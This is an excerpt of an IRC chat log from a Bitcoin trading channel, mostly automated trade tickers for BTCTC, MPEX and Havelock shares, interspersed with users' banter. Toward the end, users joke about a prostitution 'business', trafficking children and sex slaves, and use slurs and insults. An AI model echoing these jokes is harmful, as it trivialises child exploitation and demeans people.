18:58:20 [MPEX] [S.MPOE] 687 @ 0.00088197 = 0.6059 BTC [+] Sep 06 18:58:27 [MPEX] [S.MPOE] 6171 @ 0.00088133 = 5.4387 BTC [-] Sep 06 18:58:28 [MPEX] [S.MPOE] 5600 @ 0.00088052 = 4.9309 BTC [-] Sep 06 18:58:32 [MPEX] [S.MPOE] 1142 @ 0.00087982 = 1.0048 BTC [-] Sep 06 18:58:44 [BTCTC] [DMS.SELLING] 2 @ 0.009948 = 0.0199 BTC [-] Sep 06 18:58:55 [BTCTC] [DMS.SELLING] 251 @ 0.009949 = 2.4972 BTC [+] Sep 06 19:04:18 [BTCTC] [ASICMINER-PT] 1 @ 2.12 BTC [+] Sep 06 19:04:19 [BTCTC] [ASICMINER-PT] 2 @ 2.121 = 4.242 BTC [+] Sep 06 19:05:57 [BTCTC] [DMS.MINING] 27 @ 0.00239 = 0.0645 BTC [+] Sep 06 19:06:33 [BTCTC] [TAT.ASICMINER] 61 @ 0.02 = 1.22 BTC [+] Sep 06 19:06:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.02 = 0.2 BTC [+] Sep 06 19:06:58 [BTCTC] [DMS.MINING] 1 @ 0.00239 BTC [+] Sep 06 19:07:52 [BTCTC] [DMS.MINING] 15 @ 0.00239 = 0.0359 BTC [+] Sep 06 19:07:55 [BTCTC] [DMS.MINING] 2 @ 0.00239 = 0.0048 BTC [+] Sep 06 19:08:06 [BTCTC] [ASICMINER-PT] 4 @ 2.121 = 8.484 BTC [+] Sep 06 19:08:09 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.000651 = 0.0013 BTC [+] Sep 06 19:09:00 [BTCTC] [DMS.MINING] 4 @ 0.00239 = 0.0096 BTC [+] Sep 06 19:09:11 [BTCTC] [TAT.ASICMINER] 36 @ 0.02018 = 0.7265 BTC [+] Sep 06 19:09:11 [BTCTC] [TAT.ASICMINER] 77 @ 0.0202 = 1.5554 BTC [+] Sep 06 19:10:00 [BTCTC] [ACTIVEMINING] 10 @ 0.003901 = 0.039 BTC [+] Sep 06 19:10:04 [MPEX] [S.MPOE] 7850 @ 0.00088346 = 6.9352 BTC [+] Sep 06 19:14:08 [BTCTC] [ASICMINER-PT] 8 @ 2.121 = 16.968 BTC [+] Sep 06 19:14:52 [BTCTC] [LABCOIN] 3 @ 0.003316 = 0.0099 BTC [-] Sep 06 19:14:53 [BTCTC] [LABCOIN] 3 @ 0.003316 = 0.0099 BTC [-] Sep 06 19:15:02 [BTCTC] [DMS.SELLING] 1 @ 0.009947 BTC [-] Sep 06 19:15:17 [BTCTC] [ACTIVEMINING] 10 @ 0.003997 = 0.04 BTC [+] Sep 06 19:15:25 [BTCTC] [ASICMINER-PT] 2 @ 2.088 = 4.176 BTC [-] Sep 06 19:15:40 [BTCTC] [ACTIVEMINING] 110 @ 0.003997 = 0.4397 BTC [+] Sep 06 19:17:46 [BTCTC] [LABCOIN] 100 @ 0.0033 = 0.33 BTC [-] Sep 06 19:18:39 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0006498 = 0.0019 BTC [-] Sep 06 19:20:25 [BTCTC] [ACTIVEMINING] 10 @ 0.003995 = 0.04 BTC [-] Sep 06 19:20:25 [BTCTC] [ACTIVEMINING] 10 @ 0.003996 = 0.04 BTC [+] Sep 06 19:20:46 [BTCTC] [DMS.MINING] 400 @ 0.00239 = 0.956 BTC [+] Sep 06 19:21:06 [BTCTC] [ACTIVEMINING] 200 @ 0.004 = 0.8 BTC [+] Sep 06 19:21:09 [BTCTC] [ACTIVEMINING] 300 @ 0.0039 = 1.17 BTC [-] Sep 06 19:21:10 [BTCTC] [ACTIVEMINING] 10 @ 0.003897 = 0.039 BTC [-] Sep 06 19:21:12 [BTCTC] [ACTIVEMINING] 603 @ 0.003896 = 2.3493 BTC [-] Sep 06 19:24:23 [HAVELOCK] [XBOND] 199 @ 0.001066 = 0.2121 BTC [-] Sep 06 19:24:26 [HAVELOCK] [XBOND] 1 @ 0.00106 BTC [-] Sep 06 19:24:28 [HAVELOCK] [XBOND] 600 @ 0.00105004 = 0.63 BTC [-] Sep 06 19:24:30 [HAVELOCK] [XBOND] 14 @ 0.00105001 = 0.0147 BTC [-] Sep 06 19:24:33 [HAVELOCK] [XBOND] 6 @ 0.00105001 = 0.0063 BTC [-] Sep 06 19:24:35 [HAVELOCK] [XBOND] 42 @ 0.00105 = 0.0441 BTC [-] Sep 06 19:24:36 [HAVELOCK] [XBOND] 138 @ 0.00105 = 0.1449 BTC [-] Sep 06 19:25:33 [HAVELOCK] [XBOND] 222 @ 0.00105 = 0.2331 BTC [-] Sep 06 19:25:36 [HAVELOCK] [XBOND] 19 @ 0.00104151 = 0.0198 BTC [-] Sep 06 19:25:38 [HAVELOCK] [XBOND] 110 @ 0.0010415 = 0.1146 BTC [-] Sep 06 19:25:40 [HAVELOCK] [XBOND] 100 @ 0.00104101 = 0.1041 BTC [-] Sep 06 19:25:42 [HAVELOCK] [XBOND] 800 @ 0.001041 = 0.8328 BTC [-] Sep 06 19:25:45 [HAVELOCK] [XBOND] 47 @ 0.001041 = 0.0489 BTC [-] Sep 06 19:25:47 [HAVELOCK] [XBOND] 190 @ 0.0010405 = 0.1977 BTC [-] Sep 06 19:25:49 [HAVELOCK] [XBOND] 146 @ 0.00104011 = 0.1519 BTC [-] Sep 06 19:25:51 [HAVELOCK] [XBOND] 10 @ 0.00104 = 0.0104 BTC [-] Sep 06 19:25:53 [HAVELOCK] [XBOND] 10 @ 0.00103456 = 0.0103 BTC [-] Sep 06 19:25:55 [HAVELOCK] [XBOND] 55 @ 0.00103102 = 0.0567 BTC [-] Sep 06 19:25:56 [HAVELOCK] [XBOND] 10 @ 0.00103 = 0.0103 BTC [-] Sep 06 19:25:58 [HAVELOCK] [XBOND] 25 @ 0.00102501 = 0.0256 BTC [-] Sep 06 19:26:00 [HAVELOCK] [XBOND] 10 @ 0.001025 = 0.0103 BTC [-] Sep 06 19:26:02 [HAVELOCK] [XBOND] 41 @ 0.001025 = 0.042 BTC [-] Sep 06 19:26:04 [HAVELOCK] [XBOND] 2 @ 0.00102 = 0.002 BTC [-] Sep 06 19:26:06 [HAVELOCK] [XBOND] 10 @ 0.00102 = 0.0102 BTC [-] Sep 06 19:26:08 [HAVELOCK] [XBOND] 10 @ 0.00101 = 0.0101 BTC [-] Sep 06 19:26:10 [HAVELOCK] [XBOND] 1 @ 0.00100052 BTC [-] Sep 06 19:26:13 [HAVELOCK] [XBOND] 49 @ 0.00100052 = 0.049 BTC [-] Sep 06 19:26:15 [HAVELOCK] [XBOND] 100 @ 0.00100051 = 0.1001 BTC [-] Sep 06 19:26:16 sweet i might have to up some Sep 06 19:26:16 [HAVELOCK] [XBOND] 33 @ 0.00100002 = 0.033 BTC [-] Sep 06 19:27:01 [HAVELOCK] [XBOND] 2 @ 0.00100002 = 0.002 BTC [-] Sep 06 19:27:04 [HAVELOCK] [XBOND] 200 @ 0.00100001 = 0.2 BTC [-] Sep 06 19:27:06 [HAVELOCK] [XBOND] 1 @ 0.001 BTC [-] Sep 06 19:27:08 [HAVELOCK] [XBOND] 4 @ 0.001 = 0.004 BTC [-] Sep 06 19:27:10 [HAVELOCK] [XBOND] 200 @ 0.001 = 0.2 BTC [-] Sep 06 19:27:13 [HAVELOCK] [XBOND] 1 @ 0.001 BTC [-] Sep 06 19:27:15 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC [-] Sep 06 19:27:17 [HAVELOCK] [XBOND] 431 @ 0.001 = 0.431 BTC [-] Sep 06 19:27:48 nice Sep 06 19:27:56 maybe i'll buy some! Sep 06 19:30:52 [HAVELOCK] [AM100] 10 @ 0.0198 = 0.198 BTC [-] Sep 06 19:30:57 [BTCTC] [ASICMINER-PT] 1 @ 2.121 BTC [+] Sep 06 19:32:06 [HAVELOCK] [XBOND] 5 @ 0.00109 = 0.0055 BTC [+] Sep 06 19:34:03 [BTCTC] [DMS.MINING] 551 @ 0.00239 = 1.3169 BTC [+] Sep 06 19:38:50 [BTCTC] [DMS.MINING] 269 @ 0.0024 = 0.6456 BTC [+] Sep 06 19:39:18 [BTCTC] [ACTIVEMINING] 42 @ 0.003818 = 0.1604 BTC [-] Sep 06 19:39:20 [BTCTC] [ACTIVEMINING] 170 @ 0.003817 = 0.6489 BTC [-] Sep 06 19:39:21 [BTCTC] [ACTIVEMINING] 157 @ 0.003805 = 0.5974 BTC [-] Sep 06 19:39:22 [BTCTC] [ACTIVEMINING] 222 @ 0.003801 = 0.8438 BTC [-] Sep 06 19:39:24 [BTCTC] [ACTIVEMINING] 409 @ 0.0038 = 1.5542 BTC [-] Sep 06 19:39:39 [BTCTC] [DMS.MINING] 10 @ 0.0024 = 0.024 BTC [+] Sep 06 19:41:52 [BTCTC] [LABCOIN] 100 @ 0.003284 = 0.3284 BTC [-] Sep 06 19:42:03 [BTCTC] [LABCOIN] 100 @ 0.003285 = 0.3285 BTC [+] Sep 06 19:42:47 [BTCTC] [ASICMINER-PT] 5 @ 2.121 = 10.605 BTC [+] Sep 06 19:43:35 not low enough ye thickasthieves Sep 06 19:43:39 ;) Sep 06 19:45:14 [BTCTC] [LABCOIN] 100 @ 0.003275 = 0.3275 BTC [-] Sep 06 19:45:16 [BTCTC] [LABCOIN] 5 @ 0.003227 = 0.0161 BTC [-] Sep 06 19:45:16 [BTCTC] [LABCOIN] 3 @ 0.003227 = 0.0097 BTC [-] Sep 06 19:45:18 [BTCTC] [LABCOIN] 3 @ 0.003227 = 0.0097 BTC [-] Sep 06 19:45:19 [BTCTC] [LABCOIN] 3 @ 0.003227 = 0.0097 BTC [-] Sep 06 19:45:20 [BTCTC] [LABCOIN] 450 @ 0.003226 = 1.4517 BTC [-] Sep 06 19:45:21 [BTCTC] [LABCOIN] 150 @ 0.003224 = 0.4836 BTC [-] Sep 06 19:45:22 [BTCTC] [LABCOIN] 75 @ 0.003212 = 0.2409 BTC [-] Sep 06 19:45:23 [BTCTC] [LABCOIN] 300 @ 0.003205 = 0.9615 BTC [-] Sep 06 19:45:24 [BTCTC] [LABCOIN] 60 @ 0.003204 = 0.1922 BTC [-] Sep 06 19:45:26 [BTCTC] [LABCOIN] 1000 @ 0.003202 = 3.202 BTC [-] Sep 06 19:45:27 [BTCTC] [LABCOIN] 310 @ 0.003201 = 0.9923 BTC [-] Sep 06 19:45:28 [BTCTC] [LABCOIN] 2955 @ 0.003201 = 9.459 BTC [-] Sep 06 19:45:28 [BTCTC] [LABCOIN] 10593 @ 0.0032 = 33.8976 BTC [-] Sep 06 19:45:29 [BTCTC] [LABCOIN] 24 @ 0.003186 = 0.0765 BTC [-] Sep 06 19:48:09 [BTCTC] [DMS.MINING] 5 @ 0.0024 = 0.012 BTC [+] Sep 06 19:49:14 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0006519 = 0.0013 BTC [+] Sep 06 19:50:10 [BTCTC] [DMS.SELLING] 9 @ 0.009947 = 0.0895 BTC [-] Sep 06 19:50:14 [BTCTC] [ACTIVEMINING] 10 @ 0.003957 = 0.0396 BTC [+] Sep 06 19:50:15 [BTCTC] [ACTIVEMINING] 10 @ 0.003958 = 0.0396 BTC [+] Sep 06 19:52:13 [BTCTC] [ACTIVEMINING] 80 @ 0.003959 = 0.3167 BTC [+] Sep 06 19:53:43 [BTCTC] [LABCOIN] 100 @ 0.00325 = 0.325 BTC [+] Sep 06 19:54:13 [BTCTC] [DMS.SELLING] 1 @ 0.009947 BTC [-] Sep 06 19:54:59 [BTCTC] [ACTIVEMINING] 3 @ 0.003958 = 0.0119 BTC [-] Sep 06 19:56:28 [HAVELOCK] [XBOND] 1 @ 0.00109 BTC [+] Sep 06 19:58:16 [BTCTC] [DMS.PURCHASE] 200 @ 0.01212 = 2.424 BTC [-] Sep 06 20:00:12 [BTCTC] [LABCOIN] 5 @ 0.003262 = 0.0163 BTC [+] Sep 06 20:00:13 [BTCTC] [LABCOIN] 5 @ 0.003263 = 0.0163 BTC [+] Sep 06 20:00:14 [BTCTC] [LABCOIN] 3 @ 0.003316 = 0.0099 BTC [+] Sep 06 20:00:16 [BTCTC] [LABCOIN] 3 @ 0.003316 = 0.0099 BTC [+] Sep 06 20:00:17 [BTCTC] [LABCOIN] 3 @ 0.003316 = 0.0099 BTC [+] Sep 06 20:00:18 [BTCTC] [LABCOIN] 3 @ 0.003317 = 0.01 BTC [+] Sep 06 20:00:19 [BTCTC] [LABCOIN] 72 @ 0.00336 = 0.2419 BTC [+] Sep 06 20:09:51 [BTCTC] [LABCOIN] 5 @ 0.003296 = 0.0165 BTC [-] Sep 06 20:11:17 ;;tslb Sep 06 20:11:20 Time since last block: 39 minutes and 16 seconds Sep 06 20:14:27 ASshole. Sep 06 20:17:57 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.0006474 = 0.0104 BTC [-] Sep 06 20:22:09 [BTCTC] [BTC-GROWTH] 13 @ 0.1 = 1.3 BTC [+] Sep 06 20:22:26 [MPEX] [S.MPOE] 7300 @ 0.00088162 = 6.4358 BTC [-] Sep 06 20:22:28 [MPEX] [S.MPOE] 3650 @ 0.00088346 = 3.2246 BTC [+] Sep 06 20:22:42 [MPEX] [S.MPOE] 4773 @ 0.00088565 = 4.2272 BTC [+] Sep 06 20:23:07 [BTCTC] [ASICMINER-PT] 1 @ 2.13 BTC [+] Sep 06 20:24:30 [BTCTC] [TAT.ASICMINER] 72 @ 0.0202 = 1.4544 BTC [+] Sep 06 20:27:29 [MPEX] [S.MPOE] 4309 @ 0.00087982 = 3.7911 BTC [-] Sep 06 20:27:31 [MPEX] [S.MPOE] 6400 @ 0.00087975 = 5.6304 BTC [-] Sep 06 20:27:48 [MPEX] [S.MPOE] 5150 @ 0.00087925 = 4.5281 BTC [-] Sep 06 20:33:02 [BTCTC] [DMS.SELLING] 103 @ 0.0098 = 1.0094 BTC [-] Sep 06 20:36:14 [BTCTC] [DMS.PURCHASE] 3 @ 0.01212 = 0.0364 BTC [-] Sep 06 20:36:23 [HAVELOCK] [DEALCO] 46 @ 0.01270013 = 0.5842 BTC [-] Sep 06 20:36:25 [HAVELOCK] [DEALCO] 2 @ 0.01270011 = 0.0254 BTC [-] Sep 06 20:36:27 [HAVELOCK] [AM100] 2 @ 0.02039 = 0.0408 BTC [+] Sep 06 20:38:29 [BTCTC] [ASICMINER-PT] 1 @ 2.186 BTC [+] Sep 06 20:38:48 [BTCTC] [LABCOIN] 5 @ 0.003297 = 0.0165 BTC [+] Sep 06 20:38:49 [BTCTC] [LABCOIN] 342 @ 0.003363 = 1.1501 BTC [+] Sep 06 20:38:51 [BTCTC] [LABCOIN] 348 @ 0.003365 = 1.171 BTC [+] Sep 06 20:38:52 [BTCTC] [LABCOIN] 6 @ 0.003366 = 0.0202 BTC [+] Sep 06 20:38:53 [BTCTC] [LABCOIN] 100 @ 0.003372 = 0.3372 BTC [+] Sep 06 20:38:54 [BTCTC] [LABCOIN] 100 @ 0.003373 = 0.3373 BTC [+] Sep 06 20:38:54 [BTCTC] [LABCOIN] 666 @ 0.003386 = 2.2551 BTC [+] Sep 06 20:38:55 [BTCTC] [LABCOIN] 433 @ 0.003387 = 1.4666 BTC [+] Sep 06 20:39:03 [HAVELOCK] [AM100] 1 @ 0.0204 BTC [+] Sep 06 20:39:13 [BTCTC] [TAT.ASICMINER] 18 @ 0.0202 = 0.3636 BTC [+] Sep 06 20:39:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0203 BTC [+] Sep 06 20:39:16 [BTCTC] [TAT.ASICMINER] 9 @ 0.0203 = 0.1827 BTC [+] Sep 06 20:47:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0205 = 0.041 BTC [+] Sep 06 20:51:55 [BTCTC] [LABCOIN] 96 @ 0.003415 = 0.3278 BTC [+] Sep 06 20:52:04 [BTCTC] [LABCOIN] 96 @ 0.003416 = 0.3279 BTC [+] Sep 06 20:52:06 [BTCTC] [LABCOIN] 95 @ 0.003441 = 0.3269 BTC [+] Sep 06 20:52:07 [BTCTC] [LABCOIN] 95 @ 0.003442 = 0.327 BTC [+] Sep 06 20:52:08 [BTCTC] [LABCOIN] 500 @ 0.003454 = 1.727 BTC [+] Sep 06 20:52:09 [BTCTC] [LABCOIN] 500 @ 0.003455 = 1.7275 BTC [+] Sep 06 20:52:10 [BTCTC] [LABCOIN] 100 @ 0.003468 = 0.3468 BTC [+] Sep 06 20:52:12 [BTCTC] [LABCOIN] 100 @ 0.003469 = 0.3469 BTC [+] Sep 06 20:52:12 [BTCTC] [LABCOIN] 464 @ 0.003488 = 1.6184 BTC [+] Sep 06 20:52:13 [BTCTC] [LABCOIN] 464 @ 0.003489 = 1.6189 BTC [+] Sep 06 20:52:14 [BTCTC] [LABCOIN] 102 @ 0.003494 = 0.3564 BTC [+] Sep 06 20:52:15 [BTCTC] [LABCOIN] 5 @ 0.003495 = 0.0175 BTC [+] Sep 06 20:52:16 [BTCTC] [LABCOIN] 97 @ 0.003496 = 0.3391 BTC [+] Sep 06 20:52:17 [BTCTC] [LABCOIN] 294 @ 0.003496 = 1.0278 BTC [+] Sep 06 20:53:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.0205 = 0.41 BTC [+] Sep 06 20:53:08 [BTCTC] [ASICMINER-PT] 3 @ 2.188 = 6.564 BTC [+] Sep 06 20:54:20 [HAVELOCK] [XBOND] 1 @ 0.001079 BTC [-] Sep 06 20:55:11 [HAVELOCK] [XBOND] 33 @ 0.00105 = 0.0347 BTC [-] Sep 06 20:59:30 [BTCTC] [ACTIVEMINING] 10 @ 0.003922 = 0.0392 BTC [-] Sep 06 21:02:03 [BTCTC] [ASICMINER-PT] 2 @ 2.185 = 4.37 BTC [-] Sep 06 21:02:39 [BTCTC] [ASICMINER-PT] 2 @ 2.188 = 4.376 BTC [+] Sep 06 21:03:28 [BTCTC] [ASICMINER-PT] 2 @ 2.19 = 4.38 BTC [+] Sep 06 21:04:05 [BTCTC] [ASICMINER-PT] 3 @ 2.19 = 6.57 BTC [+] Sep 06 21:04:52 [BTCTC] [ASICMINER-PT] 1 @ 2.2 BTC [+] Sep 06 21:06:06 [BTCTC] [LABCOIN] 7 @ 0.003348 = 0.0234 BTC [-] Sep 06 21:11:27 [BTCTC] [DMS.MINING] 3 @ 0.002398 = 0.0072 BTC [-] Sep 06 21:12:44 [BTCTC] [LABCOIN] 7 @ 0.003348 = 0.0234 BTC [-] Sep 06 21:13:00 [BTCTC] [ASICMINER-PT] 1 @ 2.2 BTC [+] Sep 06 21:13:01 [BTCTC] [ASICMINER-PT] 2 @ 2.2 = 4.4 BTC [+] Sep 06 21:13:03 [BTCTC] [ASICMINER-PT] 5 @ 2.21 = 11.05 BTC [+] Sep 06 21:13:04 [BTCTC] [ASICMINER-PT] 1 @ 2.24 BTC [+] Sep 06 21:13:05 [BTCTC] [ASICMINER-PT] 1 @ 2.247 BTC [+] Sep 06 21:13:06 [BTCTC] [ASICMINER-PT] 1 @ 2.263 BTC [+] Sep 06 21:13:07 [BTCTC] [ASICMINER-PT] 2 @ 2.265 = 4.53 BTC [+] Sep 06 21:13:07 [BTCTC] [ASICMINER-PT] 4 @ 2.265 = 9.06 BTC [+] Sep 06 21:13:08 [BTCTC] [ASICMINER-PT] 4 @ 2.29 = 9.16 BTC [+] Sep 06 21:13:09 [BTCTC] [ASICMINER-PT] 1 @ 2.299 BTC [+] Sep 06 21:13:16 [BTCTC] [LABCOIN] 7 @ 0.003349 = 0.0234 BTC [+] Sep 06 21:14:12 [BTCTC] [LABCOIN] 349 @ 0.003408 = 1.1894 BTC [+] Sep 06 21:14:14 [BTCTC] [LABCOIN] 150 @ 0.003411 = 0.5117 BTC [+] Sep 06 21:14:15 [BTCTC] [LABCOIN] 199 @ 0.003467 = 0.6899 BTC [+] Sep 06 21:14:16 [BTCTC] [LABCOIN] 95 @ 0.003468 = 0.3295 BTC [+] Sep 06 21:14:17 [BTCTC] [LABCOIN] 95 @ 0.003469 = 0.3296 BTC [+] Sep 06 21:14:18 [BTCTC] [LABCOIN] 93 @ 0.003495 = 0.325 BTC [+] Sep 06 21:14:20 [BTCTC] [ACTIVEMINING] 10 @ 0.003918 = 0.0392 BTC [-] Sep 06 21:14:20 [BTCTC] [ACTIVEMINING] 10 @ 0.003919 = 0.0392 BTC [+] Sep 06 21:14:21 [BTCTC] [ACTIVEMINING] 197 @ 0.003959 = 0.7799 BTC [+] Sep 06 21:14:22 [BTCTC] [ACTIVEMINING] 197 @ 0.00396 = 0.7801 BTC [+] Sep 06 21:14:31 [BTCTC] [LABCOIN] 199 @ 0.003495 = 0.6955 BTC [+] Sep 06 21:15:20 [BTCTC] [LABCOIN] 158 @ 0.003497 = 0.5525 BTC [+] Sep 06 21:15:21 v Sep 06 21:15:21 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [-] Sep 06 21:15:22 https://bitcointalk.org/index.php?topic=288962.msg3096212#msg3096212 Sep 06 21:15:25 [BTCTC] [LABCOIN] 192 @ 0.003499 = 0.6718 BTC [+] Sep 06 21:15:26 [BTCTC] [ACTIVEMINING] 63 @ 0.003985 = 0.2511 BTC [+] Sep 06 21:15:27 Fanpas.com sports betting pre-IPO plan Sep 06 21:15:31 [MPEX] [S.MPOE] 8000 @ 0.00087826 = 7.0261 BTC [-] Sep 06 21:15:45 [BTCTC] [TAT.ASICMINER] 51 @ 0.0205 = 1.0455 BTC [+] Sep 06 21:15:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.0205 = 0.205 BTC [+] Sep 06 21:16:55 [BTCTC] [LTC-ATF.B2] 6 @ 0.01031 = 0.0619 BTC [-] Sep 06 21:19:19 lol kako Sep 06 21:19:25 [BTCTC] [DMS.PURCHASE] 5 @ 0.01212 = 0.0606 BTC [-] Sep 06 21:20:00 [HAVELOCK] [DEALCO] 2 @ 0.0142 = 0.0284 BTC [+] Sep 06 21:20:46 well, all these IPOs really make me want to IPO myself Sep 06 21:21:09 IPOing my jerking off would make me the king of bitcoins at least Sep 06 21:21:19 pankkake but Sep 06 21:21:23 do you have a hobby?! Sep 06 21:21:27 no hobby no ipo Sep 06 21:21:32 [BTCTC] [TAT.ASICMINER] 15 @ 0.0209 = 0.3135 BTC [+] Sep 06 21:21:56 [BTCTC] [ACTIVEMINING] 10 @ 0.003983 = 0.0398 BTC [-] Sep 06 21:22:03 i have outsorced my jerking off but i could still ipo it Sep 06 21:22:39 I tried doing that but they sucked at doing it Sep 06 21:23:05 well its all about selection Sep 06 21:23:56 [HAVELOCK] [DEALCO] 1 @ 0.0125 BTC [-] Sep 06 21:24:18 [BTCTC] [LABCOIN] 7 @ 0.003443 = 0.0241 BTC [-] Sep 06 21:24:19 [BTCTC] [LABCOIN] 3 @ 0.003444 = 0.0103 BTC [+] Sep 06 21:25:13 [BTCTC] [LABCOIN] 4 @ 0.003444 = 0.0138 BTC [+] Sep 06 21:25:37 [BTCTC] [LABCOIN] 40 @ 0.003444 = 0.1378 BTC [+] Sep 06 21:27:01 http://i.imgur.com/FYLSMwD.jpg Sep 06 21:27:11 https://bitcointalk.org/index.php?topic=288962.new#new Sep 06 21:27:14 [BTCTC] [LABCOIN] 14 @ 0.003464 = 0.0485 BTC [+] Sep 06 21:27:16 Fanpas.com sports betting pre-IPO plan Sep 06 21:27:18 so you douchebags are gonna just stand here and watch Sep 06 21:27:25 say something. Sep 06 21:28:04 [BTCTC] [LABCOIN] 700 @ 0.003496 = 2.4472 BTC [+] Sep 06 21:28:19 [BTCTC] [DMS.MINING] 5 @ 0.002398 = 0.012 BTC [-] Sep 06 21:29:00 fuck you with your trolling pankkake Sep 06 21:29:24 the dude will not know its trolling Sep 06 21:30:04 [BTCTC] [LTC-ATF.B2] 3 @ 0.01228 = 0.0368 BTC [+] Sep 06 21:30:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.01976 BTC [-] Sep 06 21:31:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.01975 = 0.079 BTC [-] Sep 06 21:31:54 [BTCTC] [ACTIVEMINING] 90 @ 0.003983 = 0.3585 BTC [-] Sep 06 21:31:56 [BTCTC] [ACTIVEMINING] 65 @ 0.003822 = 0.2484 BTC [-] Sep 06 21:31:57 [BTCTC] [ACTIVEMINING] 147 @ 0.003822 = 0.5618 BTC [-] Sep 06 21:31:58 [BTCTC] [ACTIVEMINING] 10 @ 0.003821 = 0.0382 BTC [-] Sep 06 21:32:00 [BTCTC] [ACTIVEMINING] 47 @ 0.003821 = 0.1796 BTC [-] Sep 06 21:32:27 [HAVELOCK] [SMG] 35 @ 0.00019259 = 0.0067 BTC [+] Sep 06 21:32:30 [BTCTC] [ACTIVEMINING] 422 @ 0.003986 = 1.6821 BTC [+] Sep 06 21:34:37 give fewer fucks kako Sep 06 21:34:46 just a suggestion Sep 06 21:35:59 yeah kako dont be so serious Sep 06 21:36:03 btc is fun fun fun Sep 06 21:36:11 [BTCTC] [ASICMINER-PT] 2 @ 2.299 = 4.598 BTC [+] Sep 06 21:36:13 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [+] Sep 06 21:36:15 idiots. Sep 06 21:36:36 kakobrekla, so mad Sep 06 21:36:42 be super serios Sep 06 21:36:45 serious* Sep 06 21:36:50 just don't get emotionally invested Sep 06 21:36:52 [HAVELOCK] [XBOND] 4 @ 0.00108998 = 0.0044 BTC [+] Sep 06 21:37:03 take their money, smile, and move on. Sep 06 21:37:30 if it would be emotional youd have a dick up your ass Sep 06 21:37:45 I DONT HAVE AN ASS, YOU ASS! Sep 06 21:37:52 mkay Sep 06 21:37:58 don't really see how b follows from a Sep 06 21:38:00 THANKS FOR BRINGING UP THOSE DARK MEMORIES Sep 06 21:38:17 [HAVELOCK] [XBOND] 35 @ 0.00108998 = 0.0381 BTC [+] Sep 06 21:38:20 benkay_ its eurofag thing. Sep 06 21:38:30 [HAVELOCK] [XBOND] 1 @ 0.00108998 BTC [+] Sep 06 21:38:50 [HAVELOCK] [AM100] 12 @ 0.0198001 = 0.2376 BTC [-] Sep 06 21:39:50 Working on a business plan for a Bitcoin prostitution network. It'll be called BitCock or BitPuss, respectively. A whole network of whores who accept Bitcoin and I'll connect them all through a nice Web/Mobile UI. Sep 06 21:40:11 does it have a mobile redirect?! Sep 06 21:45:13 [HAVELOCK] [AM100] 10 @ 0.0198001 = 0.198 BTC [-] Sep 06 21:45:15 DUH! Sep 06 21:45:18 AUTO REDIRECT Sep 06 21:45:20 NO OPTIONS Sep 06 21:45:27 where do i send? Sep 06 21:45:50 All funds will be put to use immediately: 1JV6GenZ14BnoLhF2t8udYArn4FHdYeYMP Sep 06 21:45:52 [BTCTC] [B.YABMC] 475 @ 0.00042 = 0.1995 BTC [-] Sep 06 21:46:29 [BTCTC] [B.YABMC] 1284 @ 0.00041 = 0.5264 BTC [-] Sep 06 21:46:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02087 BTC [+] Sep 06 21:46:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.02088 = 0.2088 BTC [+] Sep 06 21:46:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.0209 = 0.1045 BTC [+] Sep 06 21:46:45 I'll probably need about $3M to get started. I have to pay at least two other men/women to sample the worlds prostitutes and get them to accept Bitcoin. Sep 06 21:47:02 [BTCTC] [LABCOIN] 6 @ 0.003445 = 0.0207 BTC [-] Sep 06 21:47:35 ANd don't ask about P/L. It's under NDA. Sep 06 21:47:43 no animals? Sep 06 21:47:57 We are looking into animals and children. Sep 06 21:47:58 [BTCTC] [LABCOIN] 6 @ 0.003445 = 0.0207 BTC [-] Sep 06 21:48:12 especially children Sep 06 21:48:26 :D Sep 06 21:48:34 In the even that we branch out into these areas we will release a second round of shares to fund scouting/kidnapping and other necessary processes. Sep 06 21:48:43 well that was a given, men and women of any age Sep 06 21:49:19 The SEC frowns on whores of a certain age, so we have to take that into account. Can't have the SEC botching this up, ya know? Sep 06 21:49:28 i think sex slaves offer best ROI Sep 06 21:49:40 We have some numbers that look very promising. Sep 06 21:49:49 AMAZING COMPANY Sep 06 21:49:54 Yes, yes it is. Sep 06 21:49:56 [BTCTC] [LABCOIN] 6 @ 0.003445 = 0.0207 BTC [-] Sep 06 21:50:17 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [+] Sep 06 21:50:18 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [+] Sep 06 21:50:18 [BTCTC] [ASICMINER-PT] 2 @ 2.32 = 4.64 BTC [+] Sep 06 21:50:24 what kind of numbers? I live sevens Sep 06 21:50:52 well Sep 06 21:50:58 i see a nine and a four Sep 06 21:50:58 We have some sevens involved in our projections. Sep 06 21:51:06 theres also two zeros in between Sep 06 21:51:08 We also have a king and a jack. Sep 06 21:51:21 But I can't really talk about this any further. Sep 06 21:51:53 [BTCTC] [LABCOIN] 6 @ 0.003445 = 0.0207 BTC [-] Sep 06 21:52:06 they have a king Sep 06 21:52:09 a fuckin king Sep 06 21:52:11 buy buy buy Sep 06 21:52:19 What is the size of their chips, you know... Sep 06 21:52:46 We are looking into a partnership with Dealco.in as well. So you could find where to trade for coins at a reasonably price and near the best priced hooker, all through one service. Sep 06 21:52:47 Excuse me I am an engineer Sep 06 21:53:03 [BTCTC] [CRYPTO-TRADE] 14 @ 0.1972 = 2.7608 BTC [+] Sep 06 21:53:20 I produced the bionic man and the bionic woman, I think I know what I am talking about here Sep 06 21:53:22 [BTCTC] [ACTIVEMINING] 70 @ 0.004003 = 0.2802 BTC [+] Sep 06 21:53:23 [BTCTC] [ACTIVEMINING] 70 @ 0.004004 = 0.2803 BTC [+] Sep 06 21:53:27 <-- Masters in Sexual Engineering from University of Pheonix Online. Sep 06 21:53:42 [BTCTC] [LABCOIN] 476 @ 